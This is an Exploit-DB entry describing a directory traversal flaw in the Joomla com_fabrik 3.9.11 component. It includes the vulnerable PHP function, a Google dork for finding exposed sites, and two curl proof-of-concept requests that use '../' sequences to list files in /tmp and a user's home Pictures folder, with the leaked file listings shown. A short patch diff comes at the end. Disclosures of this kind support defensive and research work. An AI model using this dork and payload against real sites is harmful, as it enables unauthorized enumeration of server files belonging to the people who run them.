Joomla! com_fabrik 3.9.11 - Directory Traversal

EDB-ID:

48263

CVE:

N/A


Author:

qw3rTyTy

Type:

webapps


Platform:

PHP

Date:

2020-03-30


# Exploit Title: Joomla! com_fabrik 3.9.11 - Directory Traversal
#Google Dork: inurl:"index.php?option=com_fabrik"
#Date: 2020-03-30
#Exploit Author: qw3rTyTy
#Vendor Homepage: https://fabrikar.com/
#Software Link: https://fabrikar.com/downloads
#Version: 3.9
#Tested on: Debian/Nginx/Joomla! 3.9.11
##################################################################
#Vulnerability details
##################################################################
File: fabrik_element/image/image.php
Func: onAjax_files

   394          public function onAjax_files()
   395          {
   396                  $this->loadMeForAjax();
   397                  $folder = $this->app->input->get('folder', '', 'string');		//!!!Possible to directory-traversal.
   398
   399                  if (!strstr($folder, JPATH_SITE))
   400                  {
   401                          $folder = JPATH_SITE . '/' . $folder;
   402                  }
   403
   404                  $pathA = JPath::clean($folder);
   405                  $folder = array();
   406                  $files = array();
   407                  $images = array();
   408                  FabrikWorker::readImages($pathA, "/", $folders, $images, $this->ignoreFolders);
   409
   410                  if (!array_key_exists('/', $images))
   411                  {
   412                          $images['/'] = array();
   413                  }
   414
   415                  echo json_encode($images['/']);
   416          }
##################################################################
#PoC
##################################################################
$> curl -X GET -i "http://127.0.0.1/joomla/index.php?option=com_fabrik&task=plugin.pluginAjax&plugin=image&g=element&method=onAjax_files&folder=../../../../../../../../../../../../../../../tmp/"

...snip...
[{"value":"eila.jpg","text":"eila.jpg","disable":false},{"value":"eilanya.jpg","text":"eilanya.jpg","disable":false},{"value":"topsecret.png","text":"topsecret.png","disable":false}]
...snip...

$> curl -X GET -i "http://127.0.0.1/joomla/index.php?option=com_fabrik&task=plugin.pluginAjax&plugin=image&g=element&method=onAjax_files&folder=../../../../../../../../../../../../../../../home/user123/Pictures/"

...snip...
[{"value":"Revision2017_Banner.jpg","text":"Revision2017_Banner.jpg","disable":false},{"value":"Screenshot from 2019-02-23 22-43-54.png","text":"Screenshot from 2019-02-23 22-43-54.png","disable":false},{"value":"Screenshot from 2019-03-09 14-59-22.png","text":"Screenshot from 2019-03-09 14-59-22.png","disable":false},{"value":"Screenshot from 2019-03-09 14-59-25.png","text":"Screenshot from 2019-03-09 14-59-25.png","disable":false},{"value":"Screenshot from 2019-03-16 23-17-05.png","text":"Screenshot from 2019-03-16 23-17-05.png","disable":false},{"value":"Screenshot from 2019-03-18 07-30-41.png","text":"Screenshot from 2019-03-18 07-30-41.png","disable":false},{"value":"Screenshot from 2019-03-18 08-23-45.png","text":"Screenshot from 2019-03-18 08-23-45.png","disable":false},{"value":"Screenshot from 2019-04-08 00-09-36.png","text":"Screenshot from 2019-04-08 00-09-36.png","disable":false},{"value":"Screenshot from 2019-04-08 10-34-23.png","text":"Screenshot from 2019-04-08 10-34-23.png","disable":false},{"value":"Screenshot from 2019-04-13 08-23-48.png","text":"Screenshot from 2019-04-13 08-23-48.png","disable":false},{"value":"Screenshot from 2019-05-24 23-14-05.png","text":"Screenshot from 2019-05-24 23-14-05.png","disable":false},{"value":"b.jpg","text":"b.jpg","disable":false},{"value":"by_gh0uli.tumblr.com-8755.png.jpeg","text":"by_gh0uli.tumblr.com-8755.png.jpeg","disable":false},{"value":"max_payne_06.jpg","text":"max_payne_06.jpg","disable":false},{"value":"xxx.jpg","text":"xxx.jpg","disable":false}]
...snip...
##################################################################
#Q&D Patch (DO NOT USE :3)
##################################################################
--- ./image.php ---
+++ image_patched.php   ---
@@ -394,7 +394,7 @@
        public function onAjax_files()
        {
                $this->loadMeForAjax();
-               $folder = $this->app->input->get('folder', '', 'string');
+               $folder = $this->app->input->get('folder', '', 'cmd');
 
                if (!strstr($folder, JPATH_SITE))
                {